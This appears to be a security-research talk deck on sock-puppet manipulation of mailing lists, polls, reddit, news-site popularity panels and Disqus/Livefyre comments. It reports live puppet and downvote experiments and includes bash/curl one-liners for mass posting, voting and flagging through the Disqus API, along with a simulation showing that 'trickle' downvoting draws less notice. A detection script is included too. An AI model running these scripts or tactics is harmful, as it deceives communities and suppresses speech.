[Screenshot: The New York Times, "Egypt Cuts Off Most Internet a...", by Matt Richtel, published January 28, 2011. The lede is cut off at the right edge: "Autocratic governments often limit phone and Int... tense times. But the Internet has never faced anyt... happened in Egypt on Friday, when the governme... 80 million people and a modernizing economy cut ... access to the network and shut down cellphone se..."]
[Screenshot: Reuters, "Libya cuts off Internet service: network monitor", LOS ANGELES, Sat Feb 19, 2011 10:24pm EST]

(Reuters) - Internet service has been cut off in Libya for a second consecutive day as protesters step up demonstrations against longtime leader Muammar Gaddafi, a U.S. company that monitors Internet traffic said on Saturday.






Amateurs cut access 
[Screenshot: The Register, "Tunisia plants country-wide keystroke logger on Facebook", subhead "Gmail and Yahoo! too", by Dan Goodin, 25 Jan 2011]

Malicious code injected into Tunisian versions of Facebook, Gmail, and Yahoo! stole login credentials of users critical of the North African nation's authoritarian government, according to security experts and news reports.



The rogue JavaScript, which was individually customized to steal passwords for each site, worked when users tried to log in without availing themselves of the secure sockets layer protection designed to prevent man-in-the-middle attacks. It was found injected into Tunisian versions of Facebook, Gmail, and Yahoo! in late December, around the same time that protesters began demanding the ouster of Zine el-Abidine Ben Ali, the president who ruled the country from 1987 until his ouster 10 days ago.

Danny O'Brien, internet advocacy coordinator for the Committee to ...




[Screenshot: Homeland Security News Wire, Law enforcement technology, "London police use smartphones, social network to identify rioters", published 10 August 2011]

The rioters in London — and now, in other British cities — have been using Blackberries to outmanoeuvre the police; communicating via BlackBerry instant-message technology, as well as by social networking sites like Facebook and Twitter, the rioters repeatedly signaled fresh target areas to those caught up in the mayhem; RIM has now agreed to cooperate with Scotland Yard to turn over protestors using the service to coordinate their assaults; the police are also releasing CCTV images of the rioters to a group using face recognition technology to identify and condemn rioters; the police are also using Flickr, Tumblr, and Twitter to spot and identify participants in the riots

Smartphones, especially Blackberries, have been a helpful information transmission and coordination tool for anti-government activists in a score of Arab countries - and they ...
[Book blurb] "A must-read for those who want to know more about the future of the Internet" - Josh Silverman, CEO, Skype
Overt censorship is routed around





UGC - User Generated Content 
UGC is a new(ish) paradigm

Nothing truly new under the sun

rent-a-crowds

How will Censorship handle

UGC? 
“So it’s not only certain people have
a license to speak, now everyone 
has a license to speak. It’s a 
question of who gets heard.” 





Censorship 2.0

This is Profoundly Important




OPEN TECHNOLOGY FUND 
sock puppet

noun 

a false online identity, typically created by a person or group in order 
to promote their own opinions or views: both sides in the debate use sock 
puppets to make it seem as if scores of people are arguing a point. 



DERIVATIVES 

sock puppetry noun 



If we were evil-corp 
(or evil.gov) 
what can be done?

what will be done?

what is being done?
Challenge:

How to measure efficacy 




mail lists 
online polls 
twitter 
reddit 
news sites 
Why mailing lists?



• “Interesting” people still use it 

• Personal curiosity 




what we wanted to do 
Assume:

An email is going to a mail list

Can we make more people read it?

Assume:

An email is going to a mail list

Can we make fewer people read it?




thinkst 

applied research 




How do we measure if more (or fewer) people read our mail?

Link Clicks

How do we write mail content worth clicking on?

Plagiarize, Pilfer, Plunder & Pitch*

*but don’t be too exciting








Control email

1. Send email with link
2. Wait 48 hours
3. Count clicks

Experimental email

1. Send email with link
2. Puppets send several replies to make a longer discussion thread
3. Wait 48 hours
4. Count clicks





[Screenshot: liberationtech archive listing, the experimental thread with the puppet replies]

- [liberationtech] Recent iOS privacy checks - Keira Cran...
- [liberationtech] Recent iOS privacy checks - Todd Weiler
- [liberationtech] Recent iOS privacy checks - duncan at openmailbox.org
- [liberationtech] Recent iOS privacy checks - Keira Cran...
Control email

1. Send email with link
2. Wait 48 hours
3. Count clicks

Experimental email

1. Send email with link
2. Sock puppets send several separate emails starting new threads
3. Wait 48 hours
4. Count clicks
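One way to run the counting step of both experiments above, as an added example that is not from the original slides: each arm's mail carries its own tracking link, a (constructed) web-server access log is parsed, a hit counts as a click only if it arrives within 48 hours of that arm's send and only once per source address, and the two arms' click rates are compared with a two-proportion z-test. The list size, the tracking tokens, the `/r/<token>` redirector path and the log lines are all assumptions made for the example.

```python
import math
import re
from datetime import datetime, timedelta, timezone

LIST_SIZE = 3000                 # assumed subscriber count of the target list
WINDOW = timedelta(hours=48)     # the 48-hour counting window from the slides

# Tracking token in each arm's link -> (arm, time that mail was sent).
# Tokens and send times are hypothetical.
ARMS = {
    "c7f3": ("control", datetime(2014, 6, 2, 9, 0, tzinfo=timezone.utc)),
    "e9a1": ("experimental", datetime(2014, 6, 9, 9, 0, tzinfo=timezone.utc)),
}

# Common Log Format hit on the assumed redirector, e.g.
# 10.0.0.1 - - [02/Jun/2014:09:12:01 +0000] "GET /r/c7f3 HTTP/1.1" 302 0
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "GET /r/(?P<token>[0-9a-f]+) ')

# Constructed access log: three control hits (one is a reload, one is two days
# late), five experimental hits and one unrelated request.
SAMPLE_LOG = [
    '10.0.0.1 - - [02/Jun/2014:09:12:01 +0000] "GET /r/c7f3 HTTP/1.1" 302 0',
    '10.0.0.1 - - [02/Jun/2014:09:12:05 +0000] "GET /r/c7f3 HTTP/1.1" 302 0',
    '10.0.0.2 - - [03/Jun/2014:14:00:00 +0000] "GET /r/c7f3 HTTP/1.1" 302 0',
    '10.0.0.3 - - [05/Jun/2014:10:00:00 +0000] "GET /r/c7f3 HTTP/1.1" 302 0',
    '10.0.0.4 - - [09/Jun/2014:09:30:00 +0000] "GET /r/e9a1 HTTP/1.1" 302 0',
    '10.0.0.5 - - [09/Jun/2014:11:00:00 +0000] "GET /r/e9a1 HTTP/1.1" 302 0',
    '10.0.0.6 - - [10/Jun/2014:08:00:00 +0000] "GET /r/e9a1 HTTP/1.1" 302 0',
    '10.0.0.7 - - [10/Jun/2014:20:00:00 +0000] "GET /r/e9a1 HTTP/1.1" 302 0',
    '10.0.0.8 - - [11/Jun/2014:09:00:00 +0000] "GET /r/e9a1 HTTP/1.1" 302 0',
    '192.0.2.9 - - [11/Jun/2014:09:00:00 +0000] "GET /robots.txt HTTP/1.1" 404 0',
]


def count_clicks(log_lines):
    """Clicks per arm: inside the 48 h window after that arm's send, one per source IP."""
    clicks = {arm: 0 for arm, _ in ARMS.values()}
    seen = set()
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["token"] not in ARMS:
            continue                                   # not a tracking hit
        arm, sent = ARMS[m["token"]]
        ts = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if not sent <= ts <= sent + WINDOW:
            continue                                   # outside the counting window
        if (arm, m["ip"]) in seen:
            continue                                   # reload / re-open: count once
        seen.add((arm, m["ip"]))
        clicks[arm] += 1
    return clicks


def z_test(k_control, k_experiment, n=LIST_SIZE):
    """Two-proportion z statistic and one-sided p-value for
    'experimental click rate > control click rate', both arms sent to n readers."""
    p1, p2 = k_control / n, k_experiment / n
    pooled = (k_control + k_experiment) / (2 * n)
    se = math.sqrt(pooled * (1 - pooled) * (2 / n))
    if se == 0:
        return 0.0, 0.5                                # no clicks at all: nothing to test
    z = (p2 - p1) / se
    return z, 0.5 * math.erfc(z / math.sqrt(2))


def evaluate(log_lines, n=LIST_SIZE):
    """Click counts for both arms plus the z-test on their rates."""
    clicks = count_clicks(log_lines)
    z, p = z_test(clicks["control"], clicks["experimental"], n)
    return clicks, z, p


if __name__ == "__main__":
    clicks, z, p = evaluate(SAMPLE_LOG)
    print(clicks, f"z={z:.2f}", f"p={p:.3f}")
```

Two caveats the slides gloss over: one click per source address undercounts readers behind a shared NAT, and with a handful of clicks per arm the test has little power, so the constructed 2-versus-5 result above (p of roughly 0.13) is not evidence of anything; repeating the pair of sends several times, or running both arms on the same day against different lists, is what turns a "win" into a measurement.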





[Screenshot: liberationtech archive listing, the puppets' separate new threads]

- [liberationtech] RIPE NCC Internet-wide measurement project - duncan at openmailbox.org
- [liberationtech] nsa-observer: organising nsa leaks by attack vector - Todd Weiler
- [liberationtech] Mapping out physical surveillance across a city - Cody Tarrant
- [liberationtech] New open access journal from Usenix - Ryan Bartos
- [liberationtech] [SPAM:##] FSF email self defence project - Greg White
- [liberationtech] The Hacking Team Commercial and are there others? - Karen Dunnes
- [liberationtech] Viber features being blocked by the Gambian govt? - Mary Bukowski
“rai” also had another success
[Screenshot: VulDB entry "Apple Mac OS X up to 13.1.0 Stack Guard stack_chk_guard buffer overflow"; the right edge of the text is cut off]

General

scipID: 13247
Affected: Apple Mac OS X up to 13.1.0
Published: 05/15/2014 (rai)
Risk: problematic
Created: 05/18/2014
Entry: 74.7% complete

Summary

A vulnerability was found in Apple Mac OS X up to 13.1.0. It has been rated as probl... function stack_chk_guard of the component Stack Guard. The manipulation with a... buffer overflow vulnerability. Impacted is confidentiality, integrity, and availability.

The weakness was disclosed 05/15/2014 by rai as Mac OS X stack_chk_guard not a... mailinglist post (Full-Disclosure). The advisory is shared for download at seclists... involved in the public release. The advisory contains:

All credit due to the anon pastebin poster.

The exploitation is known to be difficult. Attacking locally is a requirement. A single... exploitation. Technical details as well as a public exploit are known.

A public exploit has been developed by rai in ANSI C and been published immedia... declared as proof-of-concept. The exploit is shared for download at maker.fea.st ... is:

(exploit listing cut off in the screenshot; only an `extern long ... stack_chk_guard ...` declaration and an `#include` line are visible)





Improved: Distract Attention From X

• combine both approaches

• when an email on X appears, start several distraction threads

• attract attention to the distractor threads by lengthening them with sock puppet mails

• prepare juicy distractor threads ahead of time




Uses for evil.{corp,gov}

• start distractor threads around emails from opponents, or from anyone else you would rather not get attention

• add light discussion to attract attention to your own emails

• discredit opponents by running a clumsy sock puppetry operation in their name
Why Polls?

Used by a few major news sites

• Huffington Post, Al Jazeera, etc.

• Many more random bloggers

Even a Golden Globe movie awards poll

Readers see the results of polls
[Screenshot: TIME, on the result of the third annual TIME 100 poll]

In a stunning result, the winner of the third annual TIME 100 poll and new owner of the title World's Most Influential Person is moot. The 21-year-old college student and founder of the online community 4chan.org, whose real name is Christopher Poole, received 16,794,368 votes and an average influence rating of 90 (out of a possible 100) to handily beat the likes of Barack Obama, Vladimir Putin and Oprah Winfrey. To put the magnitude of the upset in perspective, it’s worth noting that everyone moot beat out actually has a job.
Surely this is a solved problem

Landslide Win

Subtle Win




HuffPo Readers Poll

[Screenshot: THE HUFFPOST/YOUGOV POLL, "How closely are you following news about the group known as the Islamic State, ISIS or ISIL that has been operating in Syria and Iraq?", with bars for "YouGov: All Americans 18+" against "HuffPost Readers" in four bands: Very closely / Somewhat closely / Not very closely / Not closely at all]

Subtle Win

[Screenshot: the same HuffPost/YouGov poll panel]

Landslide Win

[Screenshot: the same HuffPost/YouGov poll panel; the visible "Very closely" / "Somewhat closely" row reads 21% / 13%]

these polls have a serious credibility problem
in 140 seconds..

TL;DR

Gilad Lotan bought followers and did some cool analysis of the network graph*

*https://medium.com/i-data/fake-friends-with-real-benefits-eec8c4693bd3

Timeline Crowding
[Screenshot: /r/netsec front page ("root@netsec /]#" header; hot | new | rising | top | gilded | wiki | promoted)]

- [Featured Post] /r/netsec's Q2 2014 Information Security Hiring Thread
- TCP reassembly bug in FreeBSD can cause kernel crash, possible memory disclosure (freebsd.org) - submitted 3 hours ago by bonsaiviking, 5 comments
- How to Safely Generate a Random Number (like 6ae51281cde590) (sockpuppet.org) - 26 points, submitted minutes ago by WastoK, 4 comments (viewed from the submitting account: "delete" and "nsfw" links are shown)
- Tails 1.0 released! (tails.boum.org) - 335 points, submitted 1 day ago, 47 comments
- OpenSSH make compiling against OpenSSL optional (article.gmane.org) - submitted an hour ago
- An overview of how reddit's new CSS filter works (self.netsec) - submitted 1 day ago by spladug
- Revocation still doesn't work (imperialviolet.org) - submitted 17 hours ago by raymii, 2 comments
- How To Setup Darkcomet RAT with download! - submitted 46 minutes ago

On large subreddits like worldnews, 50 isn’t enough for a full win
Upvote articles we want to promote
Downvote articles we want to kill

Let’s also try downvoting..

downvote stuff to knock it into the moderation queue, below the user/subreddit preference threshold

Trickle Downvoting: only cast as many downvotes as the new articles have upvotes

Up-vote our target
Trickle down-vote others
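To see why the trickle variant is the quieter one, here is an added simulation that is not from the slides: it implements reddit's "hot" ranking as published in reddit's open-source `r2/lib/db/_sorts.pyx`, pushes one target post to the top with a fixed number of bot accounts, and compares trickle downvoting of the other new posts with simply downvoting every new post with the full bot count. The posts, their organic vote counts, the submission times and the bot count are constructed for the example.

```python
from math import log10

REDDIT_EPOCH = 1134028003      # constant from reddit's _sorts.pyx
NOW = 1400000000               # constructed "now" (May 2014), seconds since the Unix epoch

# Constructed /new queue: title, organic votes, submission time. The target is the
# post we want promoted; it is the newest and has the fewest votes.
POSTS = [
    {"title": "A", "ups": 40, "downs": 5, "t": NOW - 5400},
    {"title": "B", "ups": 12, "downs": 2, "t": NOW - 1800},
    {"title": "C", "ups": 8,  "downs": 1, "t": NOW - 900},
    {"title": "target", "ups": 3, "downs": 0, "t": NOW - 600},
]


def hot(ups, downs, submitted_at):
    """reddit's hot score: log10 of the net score (so the first 10 votes count as
    much as the next 90) plus an age term that grows by one unit every 45000 s."""
    s = ups - downs
    order = log10(max(abs(s), 1))
    sign = 1 if s > 0 else -1 if s < 0 else 0
    return round(sign * order + (submitted_at - REDDIT_EPOCH) / 45000, 7)


def rank(posts):
    """Titles in the order the subreddit's hot tab would list them."""
    return [p["title"] for p in
            sorted(posts, key=lambda p: hot(p["ups"], p["downs"], p["t"]), reverse=True)]


def scores(posts):
    """Net score per post, i.e. the number a reader sees next to each submission."""
    return {p["title"]: p["ups"] - p["downs"] for p in posts}


def upvotes_to_take_top(posts, target):
    """Smallest number of extra upvotes that lifts `target` above every other post
    without touching their votes; on a big subreddit this is where 50 bots run out."""
    tgt = next(p for p in posts if p["title"] == target)
    leader = max(hot(p["ups"], p["downs"], p["t"]) for p in posts if p["title"] != target)
    extra = 0
    while hot(tgt["ups"] + extra, tgt["downs"], tgt["t"]) <= leader:
        extra += 1
    return extra


def trickle(posts, target, bots):
    """Spend `bots` upvotes on the target; on every other post cast only as many
    downvotes as it has upvotes, so its visible score hovers near zero instead of
    plunging to -50 within minutes."""
    out = []
    for p in posts:
        q = dict(p)
        if q["title"] == target:
            q["ups"] += bots
        else:
            q["downs"] += min(bots, q["ups"])
        out.append(q)
    return out


def mass_downvote(posts, bots):
    """Every new post takes the full bot count as downvotes."""
    return [dict(p, downs=p["downs"] + bots) for p in posts]


if __name__ == "__main__":
    print("organic:", rank(POSTS), scores(POSTS))
    boosted = trickle(POSTS, "target", 50)
    print("trickle:", rank(boosted), scores(boosted))
    flooded = mass_downvote(POSTS, 50)
    print("mass   :", rank(flooded), scores(flooded))
    print("upvotes alone needed:", upvotes_to_take_top(POSTS, "target"))
```

With 50 bots the trickle run leaves the other three posts at -1, -2 and -5 while the target sits on top; the mass run leaves every post at -15 or worse, which is exactly the "56 downvotes after 4 minutes" a regular reader spots. Because the score term is logarithmic, `upvotes_to_take_top` grows fast once the leader has hundreds of points, which is the "50 isn't enough" problem on a large subreddit.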
Mass-DownVoting

What would happen if we downvoted all new articles as they appeared?
Began with worldnews

[Screenshot: comment on a /r/worldnews post]

Tyacre, 19 points, an hour ago:
"How the heck is this at 56 downvotes after 4 minutes?!"

Then..
[Screenshot: /r/circlebroke2 post "WE'RE UNDER ATTACK, COMRADES! STAY CALM AND DON'T MOVE - WE'RE FIGHTING THIS THING WITH EVERYTHING WE'VE GOT!" (reddit.com), submitted by jamie_byron_dean]

[Screenshot: the reddit front page, with the worldnews moderators' post sitting among the /r/aww and /r/todayilearned submissions:]

- /r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do - submitted 4 hours ago by slapchopsuey to /r/worldnews, 794 comments
[Screenshot: the /r/worldnews moderator post]

/r/worldnews is currently under a downvote attack - here's what you need to know, and what you can do

1576 points, submitted 13 hours ago by slapchopsuey

You've probably noticed that the up/down vote numbers have suddenly turned very strange in the past few hours, with everything being downvoted below zero. This is because /r/worldnews is under attack. The source of the downvoting is currently unknown but we and the admins are investigating and doing our best to find out.

The purpose of this attack is to disrupt the subreddit. It does this by delivering enough downvotes to render posts invisible by reddit's default settings, and to discourage your participation by downvoting everything below zero.

Here's what you need to know:

• Don’t worry about the downvotes affecting your karma. The unusual votes (in this case, downvotes) will be wiped out when the source of the problem is identified. This will probably take a few days.

• One of the goals of the attack is to render posts invisible by downvoting them below the default threshold in users’ preferences settings. The way you can neutralize that part of the attack is by changing the threshold of invisibility in your user preferences. Here’s how: 1. In the upper right of your screen in the area with your username, click preferences. 2. In preferences, go to the "link options" section, and change the final line, where it says "don't show me sites with a score of less than". You can set it to any negative number (ex. -100), but even better than filling in a negative number is just leaving the box blank. By leaving the box blank you will completely neutralize the attackers’ ability to make posts invisible.

• The "hot" tab will be broken for the duration of the attack, but we recommend browsing by the "new" tab (/r/worldnews/new).

• We also recommend voting; obviously we can’t tell you how to vote, but human votes help minimize the impact of the attackers, and it only takes a fraction of a second to click the arrows.

If you like reading and participating in /r/worldnews, following the above tips can help restore most of the everyday /r/worldnews experience for you, and with your participation in voting, you can help to weaken and expose the attackers, so the admins can solve the problem faster.

We apologize for the disruption, we appreciate your patience, and we welcome any tips you have for how we can improve the /r/worldnews user experience in this time of difficulty.

1589 comments




Much speculation ensued .. 
Simultaneously, we ran the same thing on netsec...

But netsec moderators responded with intelligent discussion and roped in official reddit admins to talk about the problem..
[Screenshot: /r/netsec moderator thread with reddit admin Deimorz]

[-] [netsec moderator] 23 points 19 hours ago

I initially messaged all the admins through the reddit.com modmail, /u/cupcake1713 was the one who responded. I could try bringing it up with them but don’t believe it will be worth my time.

permalink save parent report give gold reply

[-] Deimorz [A] 76 points 18 hours ago*

You had a group of about 20 bots that were being used to downvote posts in the subreddit. We rendered the voting from those accounts ineffective, but to make it more difficult for the controller of the bots to realize that they’ve been disabled, we still need to make it look like their votes are applying. If we just throw away their votes entirely, the controller’s going to see that their bots have been blocked, and change up what they're doing immediately.

[...] that looks like the votes are still applying (even though, as you said, we don't actually rank using it internally). The fake score can't be only shown to bot accounts. If the controller opens a submission in an incognito window via TOR or something, we’d have no way of linking them back to the bots. So when their 20 downvotes are gone there, they’d know what happened. This is /r/netsec, I’m sure I don’t need to elaborate on how many other options there are for separating yourself from this sort of thing. The only feasible option is showing the fake scores to everyone unless we want detection to be trivial.

Being able to hide scores on submissions temporarily like you suggested might help some, but it really just delays the problem, it doesn't solve it. There are also various undesirable side effects from hiding submission scores that don't apply as much to comments. Over the years, a number of subreddits have tried experiments with hiding all submission scores using CSS like you've done, and they pretty much universally decided that it was a bad idea. Because the "hot" ranking involves both score and time, with things dropping in rank based on how old they are, being able to see the scores lets the viewer easily get an idea of how popular/significant different submissions are. Without that information available, it becomes extremely difficult for someone to look at a subreddit’s front page and quickly figure out which submissions were the most popular recently.

I was the one that added the ability for moderators to temporarily hide comment scores, and I've definitely thought about extending it to submissions as well. But seeing how poorly all of those experiments that tried to do the same thing with CSS ended up going has made me hesitant about it. We do already have a very "light" score-hiding for submissions, where you can't see the score for the first 2 hours unless you actually visit the comments page. I’m not fully convinced that allowing true hiding like we have for comments would be a good thing, and most likely especially not for longer time periods since it makes the front page more and more confusing the longer the scores are hidden for.
This should have been much easier to spot

[Screenshot: /r/netsec post "SA-CORE-2014-005 - Drupal core - SQL injection" (drupal.org), submitted 12 hours ago by darknessproz, 7 comments]

• voting in synch

• signup times

• some common email domains

• pattern of names

• ip-addresses from known open proxies

• user-agents: headers

• low karma interactors
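The indicators above are cheap to check together, and they are much stronger in combination than one at a time. As an added example that is not from the slides or from reddit's own tooling, the script below scores every account in a constructed vote log against them: votes cast on the same post within seconds of other accounts, signup times clustered inside an hour, a shared email domain, a templated username, an address on an assumed open-proxy list, an identical User-Agent, and low karma. The account records, the vote log, the proxy list, the thresholds and the post ids are all constructed; the puppet accounts borrow the names seen in the liberationtech screenshot.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from itertools import combinations

# Assumed feed of open proxies; a real check would use a proxy / Tor-exit list.
KNOWN_PROXIES = {"185.0.113.7", "198.51.100.23"}
# Usernames minted from a template: firstname_lastname + year, e.g. mary_bukowski1987
NAME_PATTERN = re.compile(r"^[a-z]+_[a-z]+\d{2,4}$")
PUPPET_UA = "Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0"

# Constructed account records: three puppets created within 35 minutes of each
# other from the same mail provider, plus two long-standing accounts.
ACCOUNTS = {
    "karen_dunnes1984": {"signup": datetime(2014, 5, 1, 10, 5), "email_domain": "openmailbox.org",
                         "ip": "185.0.113.7", "ua": PUPPET_UA, "karma": 2},
    "todd_weiler1979": {"signup": datetime(2014, 5, 1, 10, 12), "email_domain": "openmailbox.org",
                        "ip": "198.51.100.23", "ua": PUPPET_UA, "karma": 4},
    "mary_bukowski1987": {"signup": datetime(2014, 5, 1, 10, 40), "email_domain": "openmailbox.org",
                          "ip": "203.0.113.9", "ua": PUPPET_UA, "karma": 1},
    "old_hand": {"signup": datetime(2011, 3, 12, 8, 0), "email_domain": "gmail.com",
                 "ip": "192.0.2.44", "ua": "Mozilla/5.0 (Macintosh) Chrome/34.0", "karma": 5120},
    "lurker42": {"signup": datetime(2012, 8, 1, 19, 30), "email_domain": "gmail.com",
                 "ip": "192.0.2.77", "ua": "Mozilla/5.0 (Windows NT 6.1) Firefox/29.0", "karma": 870},
}

# Constructed vote log: (account, post id, direction, time). The puppets hit the
# same two posts within seconds of each other; the regulars vote on their own time.
VOTES = [
    ("karen_dunnes1984", "post1", "down", datetime(2014, 5, 5, 12, 0, 0)),
    ("todd_weiler1979", "post1", "down", datetime(2014, 5, 5, 12, 0, 4)),
    ("mary_bukowski1987", "post1", "down", datetime(2014, 5, 5, 12, 0, 9)),
    ("old_hand", "post1", "up", datetime(2014, 5, 5, 12, 41, 0)),
    ("karen_dunnes1984", "post2", "down", datetime(2014, 5, 5, 12, 31, 0)),
    ("todd_weiler1979", "post2", "down", datetime(2014, 5, 5, 12, 31, 3)),
    ("mary_bukowski1987", "post2", "down", datetime(2014, 5, 5, 12, 31, 7)),
    ("lurker42", "post2", "down", datetime(2014, 5, 5, 15, 2, 0)),
    ("lurker42", "post1", "up", datetime(2014, 5, 5, 16, 10, 0)),
]


def vote_sync_pairs(votes, window=timedelta(seconds=30)):
    """Per pair of accounts, how often they cast the same vote on the same post
    within `window` of each other."""
    by_key = defaultdict(list)
    for acct, post, direction, ts in votes:
        by_key[(post, direction)].append((ts, acct))
    pairs = defaultdict(int)
    for entries in by_key.values():
        entries.sort()
        for (t1, a1), (t2, a2) in combinations(entries, 2):
            if a1 != a2 and t2 - t1 <= window:
                pairs[tuple(sorted((a1, a2)))] += 1
    return pairs


def reasons_for(name, accounts, sync_pairs, signup_window=timedelta(hours=1)):
    """Which of the indicators fire for one account."""
    me = accounts[name]
    others = [a for n, a in accounts.items() if n != name]
    hits = []
    if sum(c for pair, c in sync_pairs.items() if name in pair) >= 2:
        hits.append("votes in sync")
    if sum(abs(a["signup"] - me["signup"]) <= signup_window for a in others) >= 2:
        hits.append("signup cluster")
    if sum(a["email_domain"] == me["email_domain"] for a in others) >= 2:
        hits.append("shared email domain")
    if NAME_PATTERN.match(name):
        hits.append("templated name")
    if me["ip"] in KNOWN_PROXIES:
        hits.append("open proxy ip")
    if sum(a["ua"] == me["ua"] for a in others) >= 2:
        hits.append("shared user-agent")
    if me["karma"] < 10:
        hits.append("low karma")
    return hits


def flag_puppets(accounts, votes, min_hits=3):
    """Accounts with at least `min_hits` indicators, most suspicious first."""
    sync = vote_sync_pairs(votes)
    scored = {n: reasons_for(n, accounts, sync) for n in accounts}
    flagged = [(n, r) for n, r in scored.items() if len(r) >= min_hits]
    return sorted(flagged, key=lambda nr: (-len(nr[1]), nr[0]))


if __name__ == "__main__":
    for name, hits in flag_puppets(ACCOUNTS, VOTES):
        print(f"{name}: {len(hits)} indicators: {', '.join(hits)}")
```

Any single indicator here is common among legitimate newcomers (a throwaway from a popular mail provider with no karma is the normal case), so the score is a count of coincidences, and `min_hits` is the knob a moderator or admin would tune against their own false-positive tolerance; the "votes in sync" signal is the one that needs server-side vote timestamps, which is why it is the admins, not the moderators, who could see it.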



BTW... Two months later

[Screenshot: the same post's sidebar, two views]

this post was submitted on 05 May 2014
0 points (46% like it)
54 upvotes 63 downvotes
shortlink: http://redd.it/24rhai

this post was submitted on 05 May 2014
337 points (83% upvoted)
shortlink: http://redd.it/24rhai



Growing Personas for Karma 
[Screenshot: Hacker News submission history of one persona]

Everything i needed to know about managing hackers, i learnt from my DVD collection..



Does twitter kill the blogging star ? 


Memory Corruption Attacks. The (almost) complete history.. 


Some Computer Security Prezi's 


Anonymity loves Company 


Tell HN: Toy app thrown together for fun 


Too many InfoSec Conferences? (Infographic Inside) 


Tell HN: Subscription Service that covers InfoSec Happenings.. 


What Anonymous taught us about Cyber War 


Searchable Security Conference Site 


LulzSec will be used to Usher in Regulation (few of us will like) 


Create graphs/nodes/edges in JavaScript (an arbor.js tutorial) 


Automated Shoulder Surfing Attacks (Computer Vision meets on screen keyboards) 


BlackHat 2011 (according to Twitter) 


(Simple) Chrome plugin for GPG/PGP in GMail 


Update: (Simple)Chrome plugin to enable GPG in Gmail 


Oracles Mary Ann Davidson lashes out at Security Firm 


Poll: Spotted the Polls/Karma Link? 


Etsy's Office-Hacker Job shows established companies the way.. 



You and Your Research, a modern take 






23 Links - Karma: 99 
mail lists
online polls
twitter
reddit
news sites

comment systems?
Why News Sites?

[Screenshot: hindustantimes.com front page, Monday, October 13, 2014 (lead stories on Cyclone Hudhud, Pakistani shelling in Jammu and Rahul Gandhi), with a "most viewed" panel (stories / photos / videos) in the sidebar listing:]

- India hits back with vengeance, strikes 37 Pak posts, 15 killed
- Pakistan taught 'befitting lesson', says Modi after decline in firing
- Hudhud intensifies; Odisha, Andhra brace for impact
- Vishal Bharadwaj’s Haider isn’t just 'cry freedom', it's Gandhian plea for peace
- Kailash Satyarthi's crusade to save childhood continues; 60 mn still need him

Can we influence this panel? Get articles on it or keep articles off it?








[Screenshot: Mail & Guardian, "AFRICA'S BEST READ", front page: lead story "Megachurches: The hidden pillar of Nigeria's economy" (Africa, Tim Cocks), "Why is Ebola being treated as an 'African disease?'" (Africa, Reuters), with a "Most Popular This Week" panel (MOST READ / MOST COMMENTED / LATEST NEWS) listing:]

- Dewani describes meeting Anni in plea document
- Lesetja Kganyago named new Reserve Bank governor
- Megachurches: The hidden pillar of Nigeria's economy
- Union demands Telkom retract retrenchment letters to staff

Panel features recent articles with the most page views

Page views we can control!

MOST COMMENTED
[Screenshot: online.wsj.com/home-page (business, world and Hong Kong protest headlines), with the "Popular Now" panel: 1. CDC Confirms Texas Health Worker Has Ebola; 2. A Musical Fix for American Schools; Canadian Pacific Approached CSX About Merger; ‘Maximizer’ or ‘Satisficer’ - Which Are You?]

[Screenshot: the "Popular Now - What's This?" tooltip:]

Content engaging our readers now, with additional prominence accorded if the story is rapidly gaining attention. Our WSJ algorithm comprises 30% page views, 20% Facebook, 20% Twitter, 20% email shares and 10% comments.




[Screenshot: Twitter timeline of @LailaBlunt (2,071 tweets), Jun 26: a run of tweets "Only if for 1629", "Only if for 1628", ... "Only if for 1623", each linking a different online.wsj.com/articles/... URL]

[Screenshot: online.wsj.com home page of 26 Jun, "Popular Now" panel]
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LeBron James to Opt Out of Heat 
Deal 
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How Smart Is Your Crock-Pot? 
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•" Syrian Warplanes Strike in 
Western Iraq, Killing at Least... 
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LeBron James to Opt Out 


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up to $9 billion on BNP 
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Great White Shark 
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France Approves 
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1 •" Opinion: Fouad Ajami, Great 

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Cost to register 30k accounts: 
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Cost to share 30k stories: 
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web services 






mail lists
online polls
twitter
reddit
news sites
comment systems
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In Brief 



Disqus lets you drop a few lines of .js in your page which magically gives you an entire commenting system.

Comments can be voted up/down which affects order. 

User profiles are visible across sites and your 
comments are gathered in your Disqus profile page. 

Admins get a nifty interface to moderate and maintain 
their comment threads. 




Used by Wordpress blogs, Tumblrs, soccer mom forums and CNN, Al Jazeera, Bloomberg, The Next Web, NPR, The Atlantic, IGN, The Daily Telegraph etc

thinkst
applied research
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They don’t control the full 

message 
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• Login: left as an exercise for the reader 

• Mass post:

export thread="threadid";export msg="mymessage"; (for i in `seq -f "userprefix%g" 1 100`;do echo "curl -b \"${i}.cookies\" -d \"thread=${thread}&message=${msg}&api_key=${API_KEY}\" http://disqus.com/api/3.0/posts/create.json";done;)|parallel

• Mass vote:

export post="postid";export vote="1"; (for i in `seq -f "userprefix%g" 1 100`;do echo "curl -b \"${i}.cookies\" -d \"post=${post}&vote=${vote}&api_key=${API_KEY}\" http://disqus.com/api/3.0/posts/vote.json";done;)|parallel

• Mass downvote:

export post="postid";export vote="-1"; (for i in `seq -f "userprefix%g" 1 100`;do echo "curl -b \"${i}.cookies\" -d \"post=${post}&vote=${vote}&api_key=${API_KEY}\" http://disqus.com/api/3.0/posts/vote.json";done;)|parallel

• Bonus: Flag posts to temporarily make them disappear

export post="postid"; (for i in `seq -f "userprefix%g" 1 100`;do echo "curl -b \"${i}.cookies\" -d \"post=${post}&api_key=${API_KEY}\" http://disqus.com/api/3.0/posts/report.json";done;)|parallel
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Pretty much complete control of 
Disqus forums (with 1 line of bash script)
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Wut? 
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User registration isn’t IP-limited that we’ve encountered

Email verification isn’t a requirement

Guest voting _is_ IP-limited
• Open proxy lists bypass this trivially




ALL OF THE SAME ATTACKS 
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Ainsley Earhardt test drives a 
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Ferrari goes from zero to sixty 
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Newest Oldest Hot Threads 
[Screenshot: Fox News article with Livefyre comment widget (423 people listening); a test comment "Thanks Obama!" posted by PSObama "just now", above an existing comment by boiseboy12 from 11 minutes ago]
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Flag as spam 4/5 times to remove 
(try it yourself on fox news :) 
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livefyre: one 



more thing.. 
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^ T tennis.com - Federe. 
^ ® www.tennis.com 
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"There might still be some adjustments to my schedule moving forward. I definitely 
